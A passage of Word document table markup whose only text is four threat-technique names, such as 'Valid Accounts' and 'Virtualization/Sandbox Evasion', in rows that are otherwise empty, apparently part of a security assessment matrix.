            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="272DC3A6"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21B78E86" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19E36EA4" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="451859C0" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5238023A"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49BA3EFD" w14:textId="1AA1121F" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Unused/Unsupported Cloud Regions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="090F5A89" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D10FF74" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0024DC23" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="211DD9C6" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1138371C" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34A6D52F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F4D45C3" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="09F24EFE" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11A62946" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E8A1C5A"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036E6BD6" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E2B9AA1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29D7DA92" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58E8E2D6"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795316BD" w14:textId="3040FB17" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Use Alternate Authentication Material</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="039C3930" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B4AA8E7" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A3E5DD1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65A1E1BB" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E5DB5BA" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C115E89" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01648FEE" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="1B984989" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D6B27BC" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42E039FA"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2F1D0E34" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08B6A754" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="623DEB19" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C711703"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198CD4BD" w14:textId="47ED744D" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4ACA19DF" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="464F573A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CD23664" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="577D90DD" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="072B55EA" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="248BAD81" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D8BE9E2" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="56F8713B" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5498AF3B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00875A15"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63977D77" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45B53405" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5399776F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4187D270"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12A0E8DC" w14:textId="7B938ABB" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Virtualization/Sandbox Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4211EF0D" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="450CA93A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11C4F84E" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C7680D5" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79394391" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24E209DD" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EA12440" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
